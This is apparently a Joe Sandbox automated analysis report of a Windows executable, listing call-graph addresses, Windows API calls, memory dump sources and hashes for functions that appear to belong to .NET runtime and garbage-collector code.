7ff72f5badf0 29672->29677 29674 7ff72f5e081c 29674->29669 29675 7ff72f5e0758 29675->29674 29688 7ff72f5bb250 29675->29688 29678 7ff72f5bae39 29677->29678 29686 7ff72f5baf10 29678->29686 29701 7ff72f5e0570 SwitchToThread SwitchToThread SwitchToThread SwitchToThread 29678->29701 29681 7ff72f5bb122 29682 7ff72f5bb1a0 29681->29682 29683 7ff72f5bb1e9 29681->29683 29703 7ff72f5c29c0 6 API calls 29682->29703 29704 7ff72f5bb750 VirtualAlloc VirtualUnlock DebugBreak 29683->29704 29686->29675 29687 7ff72f5baf49 29687->29681 29702 7ff72f5d3410 VirtualAlloc VirtualUnlock 29687->29702 29690 7ff72f5bb2d8 29688->29690 29689 7ff72f5bb46d 29689->29675 29690->29689 29692 7ff72f5bb2dd 29690->29692 29705 7ff72f5cf900 29690->29705 29691 7ff72f5bb405 29695 7ff72f5bb432 29691->29695 29696 7ff72f5bb477 29691->29696 29692->29689 29692->29691 29713 7ff72f5e0570 SwitchToThread SwitchToThread SwitchToThread SwitchToThread 29692->29713 29715 7ff72f5c29c0 6 API calls 29695->29715 29716 7ff72f5bb750 VirtualAlloc VirtualUnlock DebugBreak 29696->29716 29697 7ff72f5bb3da 29697->29691 29714 7ff72f5d3410 VirtualAlloc VirtualUnlock 29697->29714 29701->29687 29702->29681 29703->29686 29704->29686 29706 7ff72f5cf916 29705->29706 29707 7ff72f5cf9b0 29706->29707 29708 7ff72f5b0130 4 API calls 29706->29708 29711 7ff72f5cf947 29706->29711 29717 7ff72f5e2320 29707->29717 29708->29707 29711->29692 29712 7ff72f5b0130 4 API calls 29712->29711 29713->29697 29714->29691 29715->29689 29716->29689 29718 7ff72f5e2359 EnterCriticalSection 29717->29718 29719 7ff72f5e23e5 29717->29719 29722 7ff72f5e2379 LeaveCriticalSection 29718->29722 29720 7ff72f5b16e0 3 API calls 29719->29720 29723 7ff72f5cf9d9 29719->29723 29724 7ff72f5e2413 29720->29724 29722->29719 29723->29711 29723->29712 29724->29723 29725 7ff72f5e2424 EnterCriticalSection 29724->29725 29726 7ff72f5e2443 29725->29726 29727 7ff72f5e244a LeaveCriticalSection 29725->29727 29726->29727 29727->29723 30374 7ff72f5a4ec3 25 API calls 30333 7ff72f5bdf97 18 API calls 29864 7ff72f6530d0 29865 7ff72f6530e1 29864->29865 29866 7ff72f6530ea 29864->29866 29867 7ff72f653105 29866->29867 29869 7ff72f653050 29866->29869 29870 7ff72f653069 29869->29870 29873 7ff72f653160 29870->29873 29872 7ff72f653079 29872->29867 29874 7ff72f653177 29873->29874 29876 7ff72f6531ea 29873->29876 29878 7ff72f653220 26 API calls 29874->29878 29876->29872 29877 7ff72f65318b 29877->29872 29878->29877 29879 7ff72f5b08d0 29880 7ff72f5b08ea 29879->29880 29881 7ff72f5b08f5 29879->29881 29882 7ff72f5b0922 VirtualAlloc 29881->29882 29887 7ff72f5b096e 29881->29887 29883 7ff72f5b0955 29882->29883 29882->29887 29884 7ff72f60ac48 3 API calls 29883->29884 29885 7ff72f5b0966 29884->29885 29886 7ff72f5b09c1 VirtualFree 29885->29886 29885->29887 29886->29887 30304 7ff72f5b80d0 15 API calls 30377 7ff72f5e32d0 16 API calls 30379 7ff72f5d92ce 63 API calls 29888 7ff72f5a56a0 29894 7ff72f5a2ce0 29888->29894 29890 7ff72f5a56b2 29891 7ff72f5a56ee SetEvent 29890->29891 29900 7ff72f653840 29891->29900 29895 7ff72f5a2d06 29894->29895 29899 7ff72f5a2d24 29895->29899 29907 7ff72f5ab4e0 FlsGetValue 29895->29907 29897 7ff72f5a2d1c 29898 7ff72f5a4930 6 API calls 29897->29898 29898->29899 29899->29890 29910 7ff72f5a54e0 29900->29910 29902 7ff72f653861 29926 7ff72f6427c0 29902->29926 29905 7ff72f653866 29931 7ff72f5a5800 WaitForSingleObjectEx 29905->29931 29932 7ff72f5a57d0 SetEvent 29905->29932 29908 7ff72f5ab4fa RaiseFailFastException 29907->29908 29909 7ff72f5ab508 FlsSetValue 29907->29909 29908->29909 29911 7ff72f5a5548 29910->29911 29913 7ff72f5a550f 29910->29913 29911->29902 29912 7ff72f5a55df 29915 7ff72f5a55ff 29912->29915 29916 7ff72f5a55e6 29912->29916 29913->29911 29913->29912 29914 7ff72f5a55c6 29913->29914 29921 7ff72f5a5588 29913->29921 29922 7ff72f5a55a7 29913->29922 29919 7ff72f5a2ce0 9 API calls 29914->29919 29918 7ff72f5a562f 29915->29918 29934 7ff72f5a5370 GetLastError SetLastError 29915->29934 29933 7ff72f5ab980 GetStdHandle WriteFile 29916->29933 29918->29902 29919->29912 29920 7ff72f5a55f2 RaiseFailFastException 29920->29915 29924 7ff72f5a5590 Sleep 29921->29924 29922->29914 29925 7ff72f5a55b9 RaiseFailFastException 29922->29925 29924->29922 29924->29924 29925->29914 29935 7ff72f642890 29926->29935 29930 7ff72f6427d4 29930->29905 29931->29905 29932->29905 29933->29920 29936 7ff72f5a17fc 85 API calls 29935->29936 29938 7ff72f6428af 29936->29938 29937 7ff72f6427cf 29952 7ff72f5a17fc 29937->29952 29938->29937 29939 7ff72f6428db CoInitializeEx 29938->29939 29940 7ff72f6428f2 29939->29940 29941 7ff72f642900 29940->29941 29942 7ff72f6428f6 29940->29942 29941->29937 29956 7ff72f642970 85 API calls 29941->29956 29942->29937 29944 7ff72f64294a 29942->29944 29946 7ff72f5a1fc0 71 API calls 29942->29946 29945 7ff72f5a1fc0 71 API calls 29944->29945 29947 7ff72f642956 29945->29947 29948 7ff72f642937 29946->29948 29950 7ff72f5a2540 26 API calls 29947->29950 29949 7ff72f5a2540 26 API calls 29948->29949 29949->29944 29951 7ff72f642969 29950->29951 29953 7ff72f5a1812 29952->29953 29953->29930 29955 7ff72f65736d 29953->29955 29957 7ff72f65d620 85 API calls 29953->29957 29955->29930 29956->29937 29957->29955 30336 7ff72f5a3fa0 28 API calls 29992 7ff72f638fb0 29993 7ff72f638fea 29992->29993 29994 7ff72f639017 GetLocaleInfoEx 29993->29994 29995 7ff72f639036 29994->29995 29997 7ff72f639048 29995->29997 29998 7ff72f6240f0 85 API calls 29995->29998 29998->29997 30408 7ff72f6331b0 91 API calls 30144 7ff72f5a18b2 30145 7ff72f657360 30144->30145 30147 7ff72f5a18c8 30144->30147 30145->30147 30148 7ff72f65d620 85 API calls 30145->30148 30148->30147 30382 7ff72f5b82b0 SleepEx SwitchToThread SwitchToThread 30149 7ff72f5cc9b6 30150 7ff72f5cc9bf 30149->30150 30153 7ff72f5cc9da 30149->30153 30233 7ff72f5e0c30 QueryPerformanceCounter 30150->30233 30152 7ff72f5cc9ce 30154 7ff72f5cd127 30152->30154 30238 7ff72f5bbdb0 46 API calls 30152->30238 30155 7ff72f5cca3e 30153->30155 30234 7ff72f5c67f0 VirtualFree 30153->30234 30192 7ff72f5dadb0 30155->30192 30161 7ff72f5ccab5 30204 7ff72f5cdfd0 30161->30204 30163 7ff72f5cca48 30163->30161 30235 7ff72f5dd0e0 EnterCriticalSection LeaveCriticalSection 30163->30235 30164 7ff72f5ccad4 30219 7ff72f5d2370 30164->30219 30166 7ff72f5ccaff 30168 7ff72f5b0130 4 API calls 30166->30168 30169 7ff72f5ccb25 30166->30169 30168->30169 30170 7ff72f5ca330 13 API calls 30169->30170 30171 7ff72f5ccc04 30170->30171 30172 7ff72f5c7e30 4 API calls 30171->30172 30176 7ff72f5ccc10 30172->30176 30173 7ff72f5ccc2b 30174 7ff72f5ccc3d EnterCriticalSection 30173->30174 30175 7ff72f5cd0c5 30173->30175 30178 7ff72f5cccbd 30174->30178 30179 7ff72f5ccd1e LeaveCriticalSection 30174->30179 30180 7ff72f5cd0cc GetTickCount64 30175->30180 30176->30173 30236 7ff72f5e1200 28 API calls 30176->30236 30178->30179 30237 7ff72f5abc10 7 API calls 30178->30237 30187 7ff72f5ccd03 30179->30187 30180->30152 30182 7ff72f5cccdf 30182->30179 30183 7ff72f5cccec LeaveCriticalSection 30182->30183 30183->30187 30184 7ff72f5ccf64 30184->30175 30184->30180 30223 7ff72f5c9980 30184->30223 30185 7ff72f5ccf19 30185->30184 30191 7ff72f5c9980 4 API calls 30185->30191 30186 7ff72f5c4020 7 API calls 30186->30187 30187->30184 30187->30186 30189 7ff72f5cce69 30187->30189 30189->30185 30190 7ff72f5ca330 13 API calls 30189->30190 30190->30185 30191->30184 30194 7ff72f5dadc2 30192->30194 30195 7ff72f5cca43 30192->30195 30194->30195 30239 7ff72f5dd0e0 EnterCriticalSection LeaveCriticalSection 30194->30239 30196 7ff72f5be5f0 30195->30196 30199 7ff72f5be614 30196->30199 30197 7ff72f5be7d0 30197->30163 30202 7ff72f5be6e0 30199->30202 30240 7ff72f5dd0e0 EnterCriticalSection LeaveCriticalSection 30199->30240 30241 7ff72f5e0e70 DebugBreak DebugBreak DebugBreak DebugBreak 30199->30241 30202->30197 30242 7ff72f5dd0e0 EnterCriticalSection LeaveCriticalSection 30202->30242 30243 7ff72f5e0e70 DebugBreak DebugBreak DebugBreak DebugBreak 30202->30243 30206 7ff72f5ce084 30204->30206 30207 7ff72f5ce1ea 30206->30207 30244 7ff72f5b1630 QueryPerformanceCounter 30206->30244 30213 7ff72f5ce38d 30207->30213 30245 7ff72f5bd390 24 API calls 30207->30245 30209 7ff72f5ce356 30210 7ff72f5ce414 30209->30210 30209->30213 30246 7ff72f5c4120 7 API calls 30209->30246 30247 7ff72f5dd0e0 EnterCriticalSection LeaveCriticalSection 30210->30247 30214 7ff72f5b0e30 10 API calls 30213->30214 30218 7ff72f5ce408 30213->30218 30214->30218 30215 7ff72f5ce378 30215->30210 30216 7ff72f5ce380 30215->30216 30217 7ff72f5c7a30 5 API calls 30216->30217 30217->30213 30218->30164 30220 7ff72f5d23ad 30219->30220 30222 7ff72f5d23d7 30219->30222 30221 7ff72f5b0e30 10 API calls 30220->30221 30221->30222 30222->30166 30224 7ff72f5c999b 30223->30224 30227 7ff72f5c99cf 30224->30227 30248 7ff72f5b1630 QueryPerformanceCounter 30224->30248 30249 7ff72f5b19f0 WaitForSingleObject 30227->30249 30233->30152 30234->30155 30235->30163 30236->30173 30237->30182 30238->30154 30239->30194 30240->30199 30241->30199 30242->30202 30243->30202 30244->30207 30245->30209 30246->30215 30247->30213 30248->30227 30341 7ff72f5b6fb0 WaitForSingleObject 30342 7ff72f5da7b0 39 API calls 30306 7ff72f5bdcb5 6 API calls 30384 7ff72f636aa0 98 API calls

                                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                                  Function 00007FF72F5CD16A Relevance: 11.3, APIs: 4, Strings: 2, Instructions: 763COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: BreakDebug
                                                                                                                                                                                                                                                                                  • String ID: @=}$END
                                                                                                                                                                                                                                                                                  • API String ID: 456121617-646646346
                                                                                                                                                                                                                                                                                  • Opcode ID: 32de57e1a6750bfde0c47b7a68c88ed3004110d39829c2a4e75dfd4f32f0a8f4
                                                                                                                                                                                                                                                                                  • Instruction ID: 6557f52ed3c7e35ec8c2801874b6cc58e644ace57220d8e85378f5b02775f2ce
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32de57e1a6750bfde0c47b7a68c88ed3004110d39829c2a4e75dfd4f32f0a8f4
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9825B79F09AC686FA54AF1AAC502F4B3A0EF59B54FD44136D95E823A1DF3CA441CE30
                                                                                                                                                                                                                                                                                  Function 00007FF72F5B1460 Relevance: 10.6, APIs: 7, Instructions: 120COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72F5AB84A), ref: 00007FF72F5B146F
                                                                                                                                                                                                                                                                                  • GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF72F5AB84A), ref: 00007FF72F5B14AD
                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72F5AB84A), ref: 00007FF72F5B14D9
                                                                                                                                                                                                                                                                                  • GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF72F5AB84A), ref: 00007FF72F5B14EA
                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72F5AB84A), ref: 00007FF72F5B14F9
                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72F5AB84A), ref: 00007FF72F5B1590
                                                                                                                                                                                                                                                                                  • GetProcessAffinityMask.KERNEL32 ref: 00007FF72F5B15A3
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 580471860-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 03dbf51e9477a4b2f0782d4ffae03c46400fccc10c807166d3160a18ce5dc755
                                                                                                                                                                                                                                                                                  • Instruction ID: 74f78f1b7fb51badc3dab34441f460823529c278259242064ab3e54eb0383628
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 03dbf51e9477a4b2f0782d4ffae03c46400fccc10c807166d3160a18ce5dc755
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7514C75B1C78687EA40AF16EC405E9A3A1FB48780FC44032D98E4B7A9DE3DE504CF20
                                                                                                                                                                                                                                                                                  Function 00007FF72F5C8830 Relevance: 3.5, APIs: 2, Instructions: 952COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 6f93bc1d4941456f45dda91854c7f695a82bcce70b9b063c41ad38af2987899c
                                                                                                                                                                                                                                                                                  • Instruction ID: 4a3f7e61b6d001a35b182e6b4a3cbba71fbf8e01f52abb2f150722fc849e9a52
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f93bc1d4941456f45dda91854c7f695a82bcce70b9b063c41ad38af2987899c
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1CB24C76B09BC686EA40AF15EC802B9B7A4FB48B44FE4453AC94E17765DF3CE451CB20
                                                                                                                                                                                                                                                                                  Function 00007FF72F5CDFD0 Relevance: 3.2, Strings: 2, Instructions: 685COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: @=}$d
                                                                                                                                                                                                                                                                                  • API String ID: 0-4053520297
                                                                                                                                                                                                                                                                                  • Opcode ID: 097b62bcefa2e15c075ed7cd1fc2a7246b24135ed2dc7981fe42efd19a6c3ad6
                                                                                                                                                                                                                                                                                  • Instruction ID: f5c8a394293efc6a2e8d26873253c7ca69139c00015f7d446bcfac8e877292a9
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 097b62bcefa2e15c075ed7cd1fc2a7246b24135ed2dc7981fe42efd19a6c3ad6
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A62AC65B186C687FA65AF26AC413B9F6A1FF59780FD09135D90E53350EF3CA881CA30
                                                                                                                                                                                                                                                                                  Function 00007FF72F5B9340 Relevance: 2.7, Strings: 2, Instructions: 238COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                  control_flow_graph 1215 7ff72f5b9340-7ff72f5b936a call 7ff72f5b0130 call 7ff72f5b1650 1220 7ff72f5b9373-7ff72f5b9384 1215->1220 1221 7ff72f5b936c-7ff72f5b9371 1215->1221 1222 7ff72f5b9388-7ff72f5b93a2 1220->1222 1221->1222 1223 7ff72f5b93a4-7ff72f5b93a9 1222->1223 1224 7ff72f5b93ab-7ff72f5b93bc 1222->1224 1225 7ff72f5b93c0-7ff72f5b93fa call 7ff72f5ac190 call 7ff72f5b11e0 call 7ff72f5b26a0 1223->1225 1224->1225 1232 7ff72f5b940c-7ff72f5b9413 call 7ff72f5b1010 1225->1232 1233 7ff72f5b93fc-7ff72f5b940a 1225->1233 1236 7ff72f5b9418 1232->1236 1234 7ff72f5b941f-7ff72f5b9440 call 7ff72f5c5d00 1233->1234 1239 7ff72f5b9442-7ff72f5b944b 1234->1239 1240 7ff72f5b944c-7ff72f5b946d call 7ff72f5b2720 call 7ff72f5b3440 1234->1240 1236->1234 1245 7ff72f5b946f 1240->1245 1246 7ff72f5b9476-7ff72f5b94a4 call 7ff72f5c5f00 1240->1246 1245->1246 1249 7ff72f5b94a6-7ff72f5b94a8 1246->1249 1250 7ff72f5b94b9-7ff72f5b94d7 call 7ff72f5b3410 call 7ff72f5b2670 1246->1250 1249->1250 1251 7ff72f5b94aa-7ff72f5b94b8 1249->1251 1256 7ff72f5b955d-7ff72f5b9596 call 7ff72f5b3420 call 7ff72f5b3430 call 7ff72f5b2560 call 7ff72f5b2680 1250->1256 1257 7ff72f5b94dd-7ff72f5b94e7 1250->1257 1278 7ff72f5b95b1-7ff72f5b95c0 1256->1278 1279 7ff72f5b9598-7ff72f5b95b0 1256->1279 1259 7ff72f5b9506-7ff72f5b952d call 7ff72f5b1200 1257->1259 1260 7ff72f5b94e9-7ff72f5b94f0 1257->1260 1269 7ff72f5b952f-7ff72f5b9537 call 7ff72f5b1200 1259->1269 1270 7ff72f5b9539-7ff72f5b9546 1259->1270 1262 7ff72f5b94f2-7ff72f5b94f9 1260->1262 1263 7ff72f5b954a-7ff72f5b9556 1260->1263 1267 7ff72f5b9500-7ff72f5b9504 1262->1267 1268 7ff72f5b94fb-7ff72f5b94fe 1262->1268 1263->1256 1267->1263 1268->1263 1269->1263 1270->1263 1280 7ff72f5b95c2-7ff72f5b95d3 1278->1280 1281 7ff72f5b95f1-7ff72f5b95f8 1278->1281 1282 7ff72f5b95d5-7ff72f5b95da 1280->1282 1283 7ff72f5b95dc-7ff72f5b95ef 1280->1283 1284 7ff72f5b9724 1281->1284 1285 7ff72f5b95fe-7ff72f5b9609 1281->1285 1282->1285 1283->1285 1287 7ff72f5b9729-7ff72f5b9741 1284->1287 1285->1284 1286 7ff72f5b960f-7ff72f5b962f call 7ff72f5d1560 1285->1286 1289 7ff72f5b9634-7ff72f5b9668 call 7ff72f5b33d0 call 7ff72f5b3400 call 7ff72f5b33e0 call 7ff72f5b33f0 1286->1289 1298 7ff72f5b9719-7ff72f5b971b 1289->1298 1299 7ff72f5b966e-7ff72f5b969d call 7ff72f5b2660 call 7ff72f60ac48 1289->1299 1298->1287 1304 7ff72f5b969f-7ff72f5b96b1 call 7ff72f5b0b90 1299->1304 1305 7ff72f5b971d 1299->1305 1304->1284 1308 7ff72f5b96b3-7ff72f5b96bf call 7ff72f5b0c50 1304->1308 1305->1284 1311 7ff72f5b96c1-7ff72f5b96d2 call 7ff72f5a2c80 1308->1311 1312 7ff72f5b96d4-7ff72f5b96ff call 7ff72f5cfdd0 1308->1312 1311->1287 1317 7ff72f5b9701 call 7ff72f60ac40 1312->1317 1318 7ff72f5b9706-7ff72f5b9708 1312->1318 1317->1318 1318->1298 1320 7ff72f5b970a-7ff72f5b9714 call 7ff72f5e4840 call 7ff72f5a2c80 1318->1320 1320->1298
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: GlobalMemoryProcessQueryStatus$CurrentFrequencyInformationObjectPerformance
                                                                                                                                                                                                                                                                                  • String ID: Creation of WaitForGCEvent failed$TraceGC is not turned on
                                                                                                                                                                                                                                                                                  • API String ID: 133006248-518909315
                                                                                                                                                                                                                                                                                  • Opcode ID: 3f99d9c4068ce16fac88113a0baf40306a504a41c0001bff05d2c2920de71d5b
                                                                                                                                                                                                                                                                                  • Instruction ID: 3c3bb98f11a32c88161a72c884838f6b7be0bb30a1cb2ba44a57b77da1928d3a
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f99d9c4068ce16fac88113a0baf40306a504a41c0001bff05d2c2920de71d5b
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EDB17A25F0DBC282FA55BB26EC612FAE291EF59784FD40135E54E0679ADF2CB0418B70
                                                                                                                                                                                                                                                                                  Function 00007FF72F638FB0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
